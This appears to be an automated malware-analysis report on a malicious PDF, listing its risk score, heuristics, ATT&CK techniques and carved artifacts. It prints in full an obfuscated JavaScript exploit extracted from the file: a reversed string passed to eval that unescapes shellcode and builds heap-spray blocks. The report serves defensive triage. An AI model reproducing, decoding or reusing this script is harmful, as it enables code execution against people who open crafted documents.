MALICIOUS
68
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.002 Spearphishing Attachment
The PDF was flagged by a machine learning classifier with high confidence as malicious. Static analysis revealed embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics, and an extracted JavaScript file. The presence of JavaScript within a PDF commonly indicates an attempt to execute malicious code, such as downloading a second-stage payload from an embedded URL. The ML_NYX_PDF_MALICIOUS heuristic strongly supports this assessment.
Machine Learning
- Nyx PDF Classifier malicious score 0.9996
Heuristics 4
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.bitstream.com In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x104F0 | 3686 bytes |
SHA-256: 6d6dce08411ff543b78f0bb3e251b4fe9d117e4067d8387638ee0f96deb1631d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) ipmet (epak = olygak rav ;epacsenu = epak rav } } ]j[lp =+ ipmet esle ;"%" =+ ipmet )"Q" == ]j[lp( fi { )"P" =! ]j[lp( fi { )++j;htgnel.lp<j;0=j( rof ;"" = ipmet rav ;"7e14uQ4d0cuQ791cuQc212uQ6322uQfb9buQ553auQebb6uQ25c0uQdadfuQebc7uQ1e93uQbc97uQ2112uQe318uQae2auQ0cdbuQ6611uQ11cfuQde4buQ8045uQ11efuQadfeuQ641euQ1506uQd20duQ94ecuQd2ecuQ3376uQbaa3uQ869euQebb3uQ2ebfuQ1cd9uQ0f31uQf606uQ0a5buQ4b8fuQ46ceuQeeaduQ2a56uQ56bduQ8895uQ256fuQec53uQ5907uQ4093uQ135euQcd8buQ2bd3uQ93e1uQ468auQ9f36uQ9dfauQ1801uQ628duQ4469uQba08uQa791uQ34bcuQ1762uQ282fuQ1879uQ5e10uQdbcduQ021duQc1dduQa057uQ2552uQ299fuQb45fuQ5e34uQe212uQ55b3uQ8fa2uQ44a3uQc465uQ5d58uQ3991uQ517duQ253euQ0c59uQb682uQ3953uQ792duQf431uQ61c7uQe4d9uQ0213uQ5e71uQ7ee3uQd615uQ1aa8uQd5a9uQ1a6cuQce50uQ5bd8uQdd71uQb386uQc146uQ3b09uQ2f9euQ30a4uQ3c40uQ7138uQ1335uQ1b33uQ9cb5uQ4f13uQ4742uQ649duQ1eb0uQab91uQ9d0duQ0070uQf211uQ0070uQ137duQ0070uQd451uQff09uQffffuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQff09uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQffffuQ8e6euQ0070uQbb51uQ0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPbPeP5P0PuPQP5P7PePePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP1P8PbPfPuPQP2PcP4P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P0P3P8PuPQP3P8P0PcPuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP9P8P8P1PuPQPbP8PaP1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP5P1P8P5PuPQPaP5PbPePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P5P0P9PuPQPaP5P0P9PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP1P3P7PdPuPQP0P0P0P0PuPQP0P4P0P0PuPQP0P0P0P0PuPQP0P0P0P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P0P0PuPQP0P0P0P0PuPQP1P0P0P0PuPQP0P0P1P0PuPQPfPfPfPfPuPQPfPfPfPfPuPQP0P0P7P0PuPQP4P5PcP5PuPQP0P0P7P0PuPQP2PeP2P5PuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP0P0P1P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2PbPfP7PuPQPePfPfP7PuPQP0P0P3P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPdP4P5P1PuPQP0P0P0P0PuPQP0P0P0P1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP1P0P0P0PuPQP4P2P1P0PuPQP0P0P7P0PuPQP9P9P5P1PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP3P3P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQPfP6P5P1PuPQP0P0P7P0PuPQPfPeP8P4PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQP9P1P9P4PuPQPcP0PcP0PuPQPcP0PcP0PuPQP" = lp rav ';
eva(s.split("").reverse().join(""));
|
|||
font_00_sfnt_off00000319.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x319 | 65932 bytes |
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.